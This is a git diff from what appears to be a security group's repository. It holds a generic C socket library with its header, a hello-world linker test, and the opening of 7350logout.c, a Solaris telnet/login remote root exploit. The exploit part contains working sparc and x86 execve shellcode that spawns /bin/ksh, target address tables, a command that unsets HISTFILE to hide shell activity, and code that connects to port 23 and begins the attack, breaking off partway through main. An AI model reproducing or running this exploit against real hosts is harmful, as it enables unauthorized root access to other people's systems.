286#ifdef SO_REUSEPORT
287 if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEPORT, &reusetmp, sizeof (reusetmp)) == -1)
288 goto berror;
289#else
290 if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEADDR, &reusetmp, sizeof (reusetmp)) == -1)
291 goto berror;
292#endif
293
294 sap = (struct sockaddr_in *) &b->bsa;
295 sap->sin_family = AF_INET;
296 sap->sin_port = htons (port); /* 0 = ephemeral */
297
298 if (ip != NULL) {
299 if (strcmp (ip, "*") == 0) {
300 sap->sin_addr.s_addr = htonl (INADDR_ANY);
301 } else {
302 if (!(sap->sin_addr.s_addr = net_resolve (ip))) {
303 goto berror;
304 }
305 }
306 } else {
307 sap->sin_addr.s_addr = htonl (INADDR_ANY);
308 }
309
310 br = bind (b->bs, (struct sockaddr *) &b->bsa, sizeof (struct sockaddr));
311 if (br == -1)
312 goto berror;
313
314 len = sizeof (struct sockaddr);
315 gsnr = getsockname (b->bs, (struct sockaddr *) &b->bsa, &len);
316 b->port = ntohs (sap->sin_port);
317 if (gsnr == -1)
318 goto berror;
319
320 lr = listen (b->bs, 16);
321 if (lr == -1) {
322 goto berror;
323 }
324 return (b);
325
326berror:
327 free (b);
328
329 return(NULL);
330}
331
332
333unsigned long int
334net_resolve (char *host)
335{
336 long i;
337 struct hostent *he;
338
339 i = inet_addr(host);
340 if (i == -1) {
341 he = gethostbyname(host);
342 if (he == NULL) {
343 return (0);
344 } else {
345 return (*(unsigned long *) he->h_addr);
346 }
347 }
348 return (i);
349}
350
351
352int
353net_assignaddr (int sd, char *sourceip, unsigned short int sourceport)
354{
355 struct sockaddr_in sourcedef;
356
357 if (sourceip && strcmp (sourceip, "*") == 0)
358 sourceip = NULL;
359
360 if (sourceip == NULL && sourceport == 0)
361 return (1);
362
363 memset (&sourcedef, '\0', sizeof (struct sockaddr_in));
364
365 /* if sourceip is specified, set it */
366 if (sourceip) {
367 sourcedef.sin_addr.s_addr = net_resolve (sourceip);
368 } else {
369 sourcedef.sin_addr.s_addr = htonl (INADDR_ANY);
370 }
371 if (sourceport)
372 sourcedef.sin_port = htons (sourceport);
373
374 /* now set the source on the socket by binding it */
375 if (bind (sd, (struct sockaddr *) &sourcedef, sizeof (struct sockaddr_in)) == -1) {
376 return (0);
377 }
378
379 return (1);
380}
381
382
383int
384net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
385 unsigned short int sourceport, int sec)
386{
387 int n,
388 len,
389 error,
390 flags;
391 int fd;
392 struct timeval tv;
393 fd_set rset, wset;
394 struct sockaddr_in csa;
395
396 if (cs == NULL)
397 cs = &csa;
398
399 /* first allocate a socket */
400 cs->sin_family = AF_INET;
401 cs->sin_port = htons (port);
402 fd = socket (cs->sin_family, SOCK_STREAM, 0);
403 if (fd == -1)
404 return (-1);
405
406 /* check wether we should change the defaults */
407 if (net_assignaddr (fd, sourceip, sourceport) == 0) {
408 close (fd);
409 return (-1);
410 }
411
412 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
413 close (fd);
414 return (-1);
415 }
416
417 flags = fcntl (fd, F_GETFL, 0);
418 if (flags == -1) {
419 close (fd);
420 return (-1);
421 }
422 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
423 if (n == -1) {
424 close (fd);
425 return (-1);
426 }
427
428 error = 0;
429
430 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
431 if (n < 0) {
432 if (errno != EINPROGRESS) {
433 close (fd);
434 return (-1);
435 }
436 }
437 if (n == 0)
438 goto done;
439
440 FD_ZERO(&rset);
441 FD_ZERO(&wset);
442 FD_SET(fd, &rset);
443 FD_SET(fd, &wset);
444 tv.tv_sec = sec;
445 tv.tv_usec = 0;
446
447 n = select(fd + 1, &rset, &wset, NULL, &tv);
448 if (n == 0) {
449 close(fd);
450 errno = ETIMEDOUT;
451 return (-1);
452 }
453 if (n == -1)
454 return (-1);
455
456 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
457 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
458 len = sizeof(error);
459 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
460 errno = ETIMEDOUT;
461 return (-1);
462 }
463 if (error == 0) {
464 goto done;
465 } else {
466 errno = error;
467 return (-1);
468 }
469 }
470 } else
471 return (-1);
472
473done:
474 n = fcntl(fd, F_SETFL, flags);
475 if (n == -1)
476 return (-1);
477 return (fd);
478}
479
480
481int
482net_tline (char *buf, int bufsize)
483{
484 int p;
485
486 for (p = 0; p < bufsize; p++) {
487 if (buf[p] == '\n')
488 return (p + 1);
489 }
490 return (-1);
491}
492
493#define LINET_A 1024
494
495
496int
497net_rlineta (int fd, char **buf, int sec)
498{
499 int n; /* return value */
500 int bufsize = 0;
501
502 *buf = NULL;
503
504 do {
505 bufsize += LINET_A;
506 *buf = realloc (*buf, bufsize);
507 if (*buf == NULL)
508 return (-1);
509
510 n = net_rlinet (fd, *buf + bufsize - LINET_A, LINET_A, sec);
511
512 if (n == -1)
513 goto rlinetaerr;
514 if (n >= 0)
515 goto rlinetastrip;
516 } while (n == -2);
517
518rlinetastrip:
519 *buf = realloc (*buf, strlen (*buf) + 1);
520 return (strlen (*buf));
521
522rlinetaerr:
523 free (*buf);
524 return (-1);
525}
526
527
528int
529net_rlinet (int fd, char *buf, int bufsize, int sec)
530{
531 int n;
532 unsigned long int rb = 0;
533 struct timeval tv_start, tv_cur;
534
535 memset(buf, '\0', bufsize);
536 (void) gettimeofday(&tv_start, NULL);
537
538 do {
539 (void) gettimeofday(&tv_cur, NULL);
540 if (sec > 0) {
541 if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
542 ((tv_start.tv_sec * 1000000) + (tv_start.tv_usec))) > (sec * 1000000)) {
543 return (-1);
544 }
545 }
546 n = net_rtimeout(fd, net_readtimeout);
547 if (n <= 0) {
548 return (-1);
549 }
550 n = read(fd, buf, 1);
551 if (n <= 0) {
552 return (n);
553 }
554 rb++;
555 if (*buf == '\n')
556 return (rb);
557 buf++;
558 if (rb >= bufsize)
559 return (-2); /* buffer full */
560 } while (1);
561}
562
563
564long int
565net_rbuf (int fd, char **dst)
566{
567 long int ml = 0;
568 long int read_bytes;
569 int p;
570
571 *dst = NULL;
572
573 while ((p = net_rtimeout(fd, net_readtimeout)) == 1) {
574 *dst = (char *) realloc(*dst, ml + NET_BSIZE);
575 if (*dst == NULL)
576 return (-1);
577 ml += read_bytes = read(fd, *dst + ml, NET_BSIZE);
578 if (read_bytes == 0) {
579 *dst = (char *) realloc(*dst, ml);
580 if ((*dst == NULL) && (ml == 0)) {
581 return (1);
582 } else if (*dst == NULL) {
583 return (-1);
584 } else {
585 return (ml);
586 }
587 }
588 }
589 return (-1);
590}
591
592
593int
594net_rbuft (int fd, char *dst, unsigned long int dsize)
595{
596 unsigned long int bl = 0, m;
597 int p;
598
599 while (bl < dsize) {
600 p = net_rtimeout(fd, net_readtimeout);
601 if ((p == 0) || (p == -1)) {
602 return (-1);
603 }
604
605 m = read(fd, dst + bl, (dsize - bl));
606 if ((m == 0) || (m == -1)) {
607 return (-1);
608 }
609 bl += m;
610 }
611 return (1);
612}
613
614
615int
616net_rtimeout (int fd, int sec)
617{
618 fd_set rset;
619 struct timeval tv;
620 int n, error, flags;
621
622 error = 0;
623 flags = fcntl(fd, F_GETFL, 0);
624 n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
625 if (n == -1)
626 return (-1);
627
628 FD_ZERO(&rset);
629 FD_SET(fd, &rset);
630 tv.tv_sec = sec;
631 tv.tv_usec = 0;
632
633 /* now we wait until more data is received then the tcp low level watermark,
634 * which should be setted to 1 in this case (1 is default)
635 */
636
637 n = select(fd + 1, &rset, NULL, NULL, &tv);
638 if (n == 0) {
639 n = fcntl(fd, F_SETFL, flags);
640 if (n == -1)
641 return (-1);
642 errno = ETIMEDOUT;
643 return (-1);
644 }
645 if (n == -1) {
646 return (-1);
647 }
648 /* socket readable ? */
649 if (FD_ISSET(fd, &rset)) {
650 n = fcntl(fd, F_SETFL, flags);
651 if (n == -1)
652 return (-1);
653 return (1);
654 } else {
655 n = fcntl(fd, F_SETFL, flags);
656 if (n == -1)
657 return (-1);
658 errno = ETIMEDOUT;
659 return (-1);
660 }
661}
662
663
664void
665net_write (int fd, const char *str, ...)
666{
667 char tmp[1025];
668 va_list vl;
669 int i;
670
671 va_start(vl, str);
672 memset(tmp, 0, sizeof(tmp));
673 i = vsnprintf(tmp, sizeof(tmp), str, vl);
674 va_end(vl);
675
676#ifdef DEBUG
677 printf("[snd] %s\n", tmp);
678#endif
679
680 send(fd, tmp, i, 0);
681 return;
682}
683
684
685int
686net_printip (struct in_addr *ia, char *str, size_t len)
687{
688 unsigned char *ipp;
689
690 ipp = (unsigned char *) &ia->s_addr;
691 snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
692
693 return (0);
694}
695
696
697int
698net_printipa (struct in_addr *ia, char **str)
699{
700 unsigned char *ipp;
701
702 ipp = (unsigned char *) &ia->s_addr;
703 *str = calloc (1, 256);
704 if (*str == NULL)
705 return (1);
706
707 snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
708 *str = realloc (*str, strlen (*str) + 1);
709
710 return ((*str == NULL) ? 1 : 0);
711}
712
diff --git a/other/burneye2/tmp/ldistfp/network.h b/other/burneye2/tmp/ldistfp/network.h
new file mode 100644
index 0000000..253ecc9
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.h
@@ -0,0 +1,287 @@
1/* scut's leet network library ;)
2 * 1999 (c) scut
3 *
4 * networking code
5 */
6
7#ifndef SCUT_NETWORK_H
8#define SCUT_NETWORK_H
9
10#include <sys/socket.h>
11#include <netinet/in.h>
12#include <stdio.h>
13
14#define NET_READTIMEOUT 180
15#define NET_CONNTIMEOUT 60
16#define NET_IDENTTIMEOUT 15
17
18
19typedef struct bound {
20 int bs; /* bound socket */
21 unsigned short port; /* port we bound to */
22 struct sockaddr bsa; /* bs_in */
23} bound;
24
25extern int net_readtimeout;
26extern int net_conntimeout;
27extern int net_identtimeout;
28
29
30/* net_socks_connect
31 *
32 * relays through an open socks 5 server (NO AUTH type)
33 * returns a socket descriptor which is already connected
34 */
35
36int net_socks_connect (char *socks, unsigned short int sport,
37 char *server, unsigned short int port, int sec);
38
39
40/* net_socks_put_s5info
41 *
42 * insert socks 5 compatible relay information into socket s5s,
43 * used to relay over more then just one socks server
44 */
45
46int net_socks_put_s5info (int s5s, char *server,
47 unsigned short int port, int sec);
48
49
50/* net_parseip
51 *
52 * read an ip in the format "1.1.1.1:299" or "blabla:481" into
53 * the char pointer *ip and into the port *port
54 *
55 * return 0 on failure
56 * return 1 on success
57 */
58
59int net_parseip (char *inp, char **ip, unsigned short int *port);
60
61
62/* net_getlocalip
63 *
64 * give back the main IP of the local machine
65 *
66 * return the local IP address as string on success
67 * return NULL on failure
68 */
69
70char *net_getlocalip (void);
71
72
73/* net_peeraddress
74 *
75 * return a pointer to a string representation of the remote IP address of
76 * the already connected socket `socket'
77 *
78 * return NULL on failure
79 * return string pointer on succes
80 */
81
82char * net_peeraddress (int socket);
83
84
85/* net_descriptify
86 *
87 * descriptify a socket `socket' ;)
88 *
89 * return -1 on failure
90 * return file descriptor on success
91 */
92
93FILE *net_descriptify (int socket);
94
95
96/* net_ident
97 *
98 * ident a connection identified by the host:port pairs on both sides,
99 * returning the ident in *ident
100 *
101 * return 1 on success
102 * return -1 on failure
103 */
104
105int net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
106 struct sockaddr_in *remotes, unsigned short int remoteport);
107
108
109/* net_accept
110 *
111 * accept a connection from socket s, and stores the connection
112 * into cs.
113 * wait a maximum amount of maxsec seconds for connections
114 * maxsec can also be zero (infinite wait, until connection)
115 *
116 * return 0 if no connection has been made within maxsec seconds
117 * return -1 if an error appears
118 * return the socket number if a connection has been made
119 */
120
121int net_accept (int s, struct sockaddr_in *cs, int maxsec);
122
123
124/* net_bind
125 *
126 * bind a socket to an ip:port on the local machine,
127 * `ip' can be either NULL (bind to all IP's on the host), or a pointer
128 * to a virtual host name, or a real IP, or "*" for any.
129 * `port' can be either 0 (ephemeral port), or any free port.
130 *
131 * return NULL on failure
132 * return pointer to bound structure on success
133 */
134
135bound *net_bind (char *ip, unsigned short int port);
136
137
138/* net_boundfree
139 *
140 * free the bound structure pointed to by `bf'
141 *
142 * return in any case
143 */
144
145void net_boundfree (bound *bf);
146
147
148/* net_resolve
149 *
150 * resolve a hostname pointed to by `host' into a s_addr return value
151 *
152 * return the correct formatted `s_addr' for this host on success
153 * return 0 on failure
154 */
155
156unsigned long int net_resolve (char *host);
157
158
159/* net_assignaddr
160 *
161 * assign an IP address and port to a socket
162 * sourceip can be an IP or hostname that is available on the local host,
163 * or NULL/"*" to let the kernel choose one, same applies to sourceport,
164 * it can either be zero (ephemeral port choosen by the kernel) or a
165 * valid port number
166 *
167 * return 1 on success
168 * return 0 on failure
169 */
170
171int net_assignaddr (int sd, char *sourceip, unsigned short int sourceport);
172
173
174/* net_connect
175 *
176 * connect to the given `server' and `port' with a max timeout of `sec'.
177 * initialize the sockaddr_in struct `cs' correctly (ipv4), accept any
178 * ip "123.123.123.123" or hostname "localhost", "www.yahoo.de" as hostname.
179 * create a new socket and return either -1 if failed or
180 * the connected socket if connection has been established within the
181 * timeout limit.
182 *
183 * the routine is still IPv4 biased :-/
184 * with `sourceip'/`sourceportÄ you MAY specify the source IP and source port
185 * to use for the connection, but you can set the ip or port to NULL/0,
186 * to choose the default IP and an ephemeral port. this was added later in
187 * this library, so please update your sources.
188 *
189 * return -1 on failure
190 * return socket if success
191 */
192
193int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
194 unsigned short int sourceport, int sec);
195
196
197/* net_rtimeout
198 *
199 * waits max `sec' seconds for fd to become readable
200 *
201 * return -1 on error (errno set)
202 * return 1 on readability
203 */
204
205int net_rtimeout (int fd, int sec);
206
207
208/* net_rbuf
209 *
210 * allocate memory and read socket data to `dst' until the connection
211 * gets closed.
212 *
213 * return n if success (n = number of bytes read)
214 * return -1 if failed
215 */
216
217long int net_rbuf (int fd, char **dst);
218#define NET_BSIZE 4096 /* blocksize for pre-allocation */
219
220
221/* net_rbuft
222 *
223 * read `dsize' bytes into `dst' from `fd', with timeout
224 *
225 * return 1 on success
226 * return -1 on failure
227 */
228int net_rbuft (int fd, char *dst, unsigned long int dsize);
229
230
231/* net_rlinet
232 *
233 * read a line from socket descriptor with timeout to buffer
234 * if sec = 0, then only a continuous stream of data is required, not
235 * an overall timeout.
236 *
237 * return -1 on timeout
238 * return 0 on connection close
239 * return length of readen line (including '\n')
240 *
241 * net_rlineta
242 * same as net_rlinet, but allocs the memory itself
243 */
244
245int net_rlineta (int fd, char **buf, int sec);
246int net_rlinet (int fd, char *buf, int bufsize, int sec);
247
248
249/* net_tline
250 *
251 * return length if string `buf' with a maximum length of `bufsize'
252 * contains '\n'
253 *
254 * return -1 if no '\n' in string
255 */
256
257int net_tline (char *buf, int bufsize);
258
259
260/* net_write
261 *
262 * print a formatted string to a socket, see syntax of printf
263 *
264 * return in any case
265 */
266
267void net_write (int fd, const char *str, ...);
268
269
270/* net_printip
271 *
272 * print an IP address stored in the struct in_addr pointed to by `ia' to a
273 * string `str' with a maximum length of `len'.
274 *
275 * return 0 on success
276 * return 1 on failure
277 *
278 * net_printipa behaves the same way, except it allocates memory and let
279 * `*str' point to the string
280 */
281
282int net_printip (struct in_addr *ia, char *str, size_t len);
283int net_printipa (struct in_addr *ia, char **str);
284
285
286#endif
287
diff --git a/other/burneye2/tmp/ldistfp/network.o b/other/burneye2/tmp/ldistfp/network.o
new file mode 100644
index 0000000..f43afc8
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.o
Binary files differ
diff --git a/other/burneye2/tmp/linktest/Makefile b/other/burneye2/tmp/linktest/Makefile
new file mode 100644
index 0000000..7aadd4b
--- /dev/null
+++ b/other/burneye2/tmp/linktest/Makefile
@@ -0,0 +1,21 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS=obj-dietstart/start.o -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
7
8all: hello
9
10clean:
11 rm -f hello *.o
12
13hello: hello-final.o
14 ld -o hello hello-final.o
15
16# hello-final.o is what we need as burneye input
17hello-final.o: hello.o
18 ld -r -o hello-final.o hello.o $(LIBS)
19
20hello.o: hello.c
21 $(CC) $(CFLAGS) -c -o hello.o hello.c
diff --git a/other/burneye2/tmp/linktest/dummy.c b/other/burneye2/tmp/linktest/dummy.c
new file mode 100644
index 0000000..9dbdb38
--- /dev/null
+++ b/other/burneye2/tmp/linktest/dummy.c
@@ -0,0 +1,6 @@
1
2int
3__write (void)
4{
5}
6
diff --git a/other/burneye2/tmp/linktest/hello-final.o b/other/burneye2/tmp/linktest/hello-final.o
new file mode 100644
index 0000000..3714f27
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello-final.o
Binary files differ
diff --git a/other/burneye2/tmp/linktest/hello.c b/other/burneye2/tmp/linktest/hello.c
new file mode 100644
index 0000000..9ff86fd
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello.c
@@ -0,0 +1,13 @@
1
2#include <stdio.h>
3
4
5int
6main (int argc, char *argv[])
7{
8 printf ("hello world\n");
9
10 return (0);
11}
12
13
diff --git a/other/burneye2/tmp/linktest/hello.o b/other/burneye2/tmp/linktest/hello.o
new file mode 100644
index 0000000..04cf1eb
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello.o
Binary files differ
diff --git a/other/burneye2/tmp/linktest/obj-dietstart/start.o b/other/burneye2/tmp/linktest/obj-dietstart/start.o
new file mode 100644
index 0000000..2e10da1
--- /dev/null
+++ b/other/burneye2/tmp/linktest/obj-dietstart/start.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-dietlibc b/other/burneye2/tmp/logout/7350logout-dietlibc
new file mode 100644
index 0000000..a37f1ca
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-final-dietlibc.o b/other/burneye2/tmp/logout/7350logout-final-dietlibc.o
new file mode 100644
index 0000000..6eadaf7
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-final-glibc.o b/other/burneye2/tmp/logout/7350logout-final-glibc.o
new file mode 100644
index 0000000..72006e5
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-glibc b/other/burneye2/tmp/logout/7350logout-glibc
new file mode 100644
index 0000000..7c41cc8
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-glibc
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout.c b/other/burneye2/tmp/logout/7350logout.c
new file mode 100644
index 0000000..4a14180
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout.c
@@ -0,0 +1,1189 @@
1/* 7350logout - sparc|x86/solaris login remote root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * The distribution restrictions cover the entire file, including this
14 * header notice. (This means, you are not allowed to reproduce the header).
15 *
16 * (C) COPYRIGHT TESO Security, 2001
17 * All Rights Reserved
18 *
19 *****************************************************************************
20 * 2001/12/19 -scut
21 *
22 * offsetless version (what a brainblasting mess).
23 *
24 * XXX: timing seems to be somewhat relevant, since telnetd does not cleanly
25 * flush anything to login, so we have to sleep a while. should work.
26 *
27 * on sol: cc -o 7 7.c -lnsl -lsocket
28 */
29
30#define VERSION "0.7.2"
31
32#include <sys/types.h>
33#include <sys/time.h>
34#include <sys/socket.h>
35#include <netinet/in.h>
36#include <arpa/inet.h>
37#include <arpa/telnet.h>
38#include <netdb.h>
39#include <fcntl.h>
40#include <errno.h>
41#include <unistd.h>
42#include <stdio.h>
43#include <stdlib.h>
44#include <string.h>
45
46
47/* ok, here are the guts of our PAM power technique ;)
48 *
49 * 1. we expect this memory layout in the static .bss space:
50 * [envbuf] 0x800 environment string buffer
51 * [args] 63 * 0x04 environment pointer buffer
52 * [pamh] 0x4 pam_handle pointer
53 *
54 * thats all. yes.
55 *
56 * offsetless through triple-overlapping pam_handle struct
57 * TODO: write more in-depth blarf
58 */
59
60typedef struct {
61 char * desc; /* distribution */
62 unsigned long int args; /* &args[0] buffer address */
63
64 int endianess; /* 0 = big, 1 = little */
65
66 unsigned char * shellcode;
67 unsigned int shellcode_len;
68 unsigned char * shellcode_nop; /* 4 byte nops */
69} tgt_type;
70
71
72/* 48 byte sparc/solaris pic execve shellcode, lsd-pl.net, thanks!
73 */
74unsigned char sparc_solaris_execve[] =
75 "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
76 "\x20\xbf\xff\xff" /* bn,a <shellcode> */
77 "\x7f\xff\xff\xff" /* call <shellcode+4> */
78 "\x90\x03\xe0\x20" /* add %o7,32,%o0 */
79 "\x92\x02\x20\x10" /* add %o0,16,%o1 */
80 "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
81 "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
82 "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
83 "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
84 "\x91\xd0\x20\x08" /* ta 8 */
85 "/bin/ksh";
86
87unsigned char sparc_nop[] =
88 "\x90\x1b\x80\x0e"; /* xor %sp, %sp, %o0 */
89
90
91/* 42 byte x86/solaris execve shellcode
92 * unknown author (kudos to him ! :)
93 */
94unsigned char x86_solaris_execve[] =
95 "\xeb\x1b" /* jmp */
96 "\x33\xd2" /* xorl %edx,%edx */
97 "\x58" /* popl %eax */
98 "\x8d\x78\x14" /* leal 0x14(%eax),edi */
99 "\x52" /* pushl %edx */
100 "\x57" /* pushl %edi */
101 "\x50" /* pushl %eax */
102 "\xab" /* stosl %eax,%es:(%edi) */
103 "\x92" /* xchgl %eax,%edx */
104 "\xab" /* stosl %eax,%es:(%edi) */
105 "\x88\x42\x08" /* movb %al,0x8(%edx) */
106 "\x83\xef\x3c" /* subl $0x3c,%edi */
107 "\xb0\x9a" /* movb $0x9a,%al */
108 "\xab" /* stosl %eax,%es:(%edi) */
109 "\x47" /* incl %edi */
110 "\xb0\x07" /* movb $0x7,%al */
111 "\xab" /* stosl %eax,%es:(%edi) */
112 "\xb0\x3b" /* movb $0x3b,%al */
113 "\xe8\xe0\xff\xff\xff" /* call */
114 "/bin/ksh";
115
116unsigned char x86_nop[] =
117 "\x90\x90\x90\x90"; /* TODO: replace with something innocent */
118
119
120#define SH_INIT "unset HISTFILE;id;uname -a;uptime;\n"
121
122
123tgt_type targets[] = {
124 { "Solaris 2.6|2.7|2.8 sparc", 0x00027600, 0,
125 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1,
126 sparc_nop },
127 { "Solaris 2.6|2.7|2.8 x86", /* .bss */ 0x0804f918 + 0x800, 1,
128 x86_solaris_execve, sizeof (x86_solaris_execve) - 1,
129 x86_nop },
130#if 0
131/* solaris 2.4 uses libauth, a libpam precessor, which looks different.
132 * i suppose it would be possible to make this technique work with libauth,
133 * but its not worth the effort (though they look very similar)
134 { "Solaris 2.4 SPARC", 0x00026e78,
135 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
136*/
137 { "Solaris 2.6 SPARC", 0x00027620,
138 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
139 { "Solaris 2.7|2.8 SPARC", 0x000275c0,
140 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
141#endif
142 { NULL, 0x00000000, 0, NULL, 0, NULL },
143};
144
145tgt_type target_manual_sparc = {
146 "Manual target sparc", 0x0, 0,
147 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1,
148 sparc_nop
149};
150
151tgt_type target_manual_x86 = {
152 "Manual target x86", 0x0, 0,
153 x86_solaris_execve, sizeof (x86_solaris_execve) - 1,
154 x86_nop
155};
156
157unsigned char manual_type;
158unsigned long int manual_args = 0x0;
159
160char * dest = "127.0.0.1"; /* can be changed with -d */
161int xp_final = 0,
162 verbose = 0,
163 debug = 0,
164 ttyp = 0; /* force "TTYPROMPT" environment */
165
166
167/* prototypes
168 */
169
170void usage (char *progname);
171void shell (int sock);
172void hexdump (char *desc, unsigned char *data, unsigned int amount);
173void exploit (int fd);
174void exploit_setenv (int fd, unsigned char *var, unsigned char *val);
175unsigned int exploit_pam (unsigned char *ww);
176unsigned int exploit_nopscode (unsigned char *ww, unsigned long playsize);
177unsigned int exploit_addstring (unsigned char *ww, unsigned char *str);
178unsigned int exploit_addbuf (unsigned char *ww, unsigned char *buf,
179 unsigned int buf_len);
180unsigned int exploit_addbufquot (unsigned char *ww, unsigned char *buf,
181 unsigned int buf_len);
182unsigned int exploit_addchars (unsigned char *ww, unsigned char wc,
183 unsigned int count);
184unsigned int exploit_addraw (unsigned char *ww, unsigned char wc);
185unsigned int exploit_addchar (unsigned char *ww, unsigned char wc);
186unsigned int exploit_addptrs (unsigned char *ww, unsigned long int ptr,
187 unsigned int count);
188unsigned int exploit_addptr (unsigned char *ww, unsigned long int ptr);
189ssize_t telnet_prompt (int fd, unsigned char *inbuf, unsigned int inbufsize,
190 char *prompt);
191unsigned char * binstrstr (unsigned char *binary, unsigned int bin_len,
192 unsigned char *str);
193ssize_t telnet_read (int fd, unsigned char *inbuf, unsigned int inbufsize);
194int telnet_eatall (int fd, unsigned char *inbuf, unsigned int inbuf_len);
195void telnet_send (int fd, unsigned char type, unsigned char option);
196void tgt_list (void);
197unsigned long int net_resolve (char *host);
198int net_connect (struct sockaddr_in *cs, char *server,
199 unsigned short int port, int sec);
200int net_rtimeout (int fd, int sec);
201int nwrite (int fd, unsigned char *ptr, unsigned int len);
202
203
204
205void
206usage (char *progname)
207{
208 fprintf (stderr, "usage: %s [-h] [-v] [-D] [-T] [-p] [-t num] [-a addr] "
209 "[-d dst]\n\n", progname);
210
211 fprintf (stderr, "-h\tdisplay this usage\n"
212 "-v\tincrease verbosity\n"
213 "-D\tDEBUG mode\n"
214 "-T\tTTYPROMPT mode (try when normal mode fails)\n"
215 "-p\tspawn ttyloop directly (use when problem arise)\n"
216 "-t num\tselect target type (zero for list)\n"
217 "-a a\tacp option: set &args[0]. format: \"[sx]:0x123\"\n"
218 "\t(manual offset, try 0x26500-0x28500, "
219 "in 0x600 steps)\n"
220 "-d dst\tdestination ip or fqhn (default: 127.0.0.1)\n\n");
221
222 exit (EXIT_FAILURE);
223}
224
225
226int fastprompt = 0;
227tgt_type * tgt = NULL;
228
229int
230main (int argc, char *argv[])
231{
232 int fd,
233 tgt_num = -1;
234 char c;
235 char * progname;
236 unsigned char rbuf[4096];
237
238
239#ifndef NOTAG
240 fprintf (stderr, "7350logout - sparc|x86/solaris login remote root "
241 "(version "VERSION") -sc.\n"
242 "team teso.\n\n");
243#endif
244
245 progname = argv[0];
246 if (argc < 2)
247 usage (progname);
248
249
250 while ((c = getopt (argc, argv, "ht:vDTpa:d:")) != EOF) {
251 switch (c) {
252 case 'h':
253 usage (progname);
254 break;
255 case 't':
256 if (sscanf (optarg, "%u", &tgt_num) != 1)
257 usage (progname);
258 break;
259 case 'v':
260 verbose += 1;
261 break;
262 case 'T':
263 ttyp = 1;
264 break;
265 case 'D':
266 debug = 1;
267 break;
268 case 'p':
269 fastprompt = 1;
270 break;
271 case 'a':
272 if (sscanf (optarg, "%c:0x%lx", &manual_type,
273 &manual_args) != 1)
274 {
275 fprintf (stderr, "give args address in [sx]:0x123 "
276 "format, dumb pentester!\n");
277 exit (EXIT_FAILURE);
278 }
279 break;
280 case 'd':
281 dest = optarg;
282 break;
283 default:
284 usage (progname);
285 break;
286 }
287 }
288
289 if (manual_args != 0) {
290 if (manual_type == 's') {
291 tgt = &target_manual_sparc;
292 } else if (manual_type == 'x') {
293 tgt = &target_manual_x86;
294 } else {
295 fprintf (stderr, "invalid [sx] manual target\n");
296 exit (EXIT_FAILURE);
297 }
298
299 tgt->args = manual_args;
300 } else if (tgt_num <= 0 ||
301 (tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
302 {
303 if (tgt_num != 0)
304 printf ("WARNING: target out of list. list:\n\n");
305
306 tgt_list ();
307
308 exit (EXIT_SUCCESS);
309 } else if (tgt == NULL)
310 tgt = &targets[tgt_num - 1];
311
312 fprintf (stderr, "# using target: %s\n", tgt->desc);
313
314 fd = net_connect (NULL, dest, 23, 20);
315 if (fd <= 0) {
316 fprintf (stderr, "failed to connect\n");
317 exit (EXIT_FAILURE);
318 }
319
320 if (ttyp) {
321 fprintf (stderr, "# setting TTYPROMPT\n");
322 exploit_setenv (fd, "TTYPROMPT", "gera");
323 }
324
325 /* catch initial telnet option processing, then wait for "login: "
326 * prompt to appear
327 */
328 telnet_prompt (fd, rbuf, sizeof (rbuf), "login: ");
329 fprintf (stderr, "# detected first login prompt\n");
330
331 /* send one initial login attempt (to set pamh)
332 */
333 write (fd, "foo 7350\n", 9);
334 sleep (1);
335 write (fd, "pass\n", 5);
336 sleep (1);
337
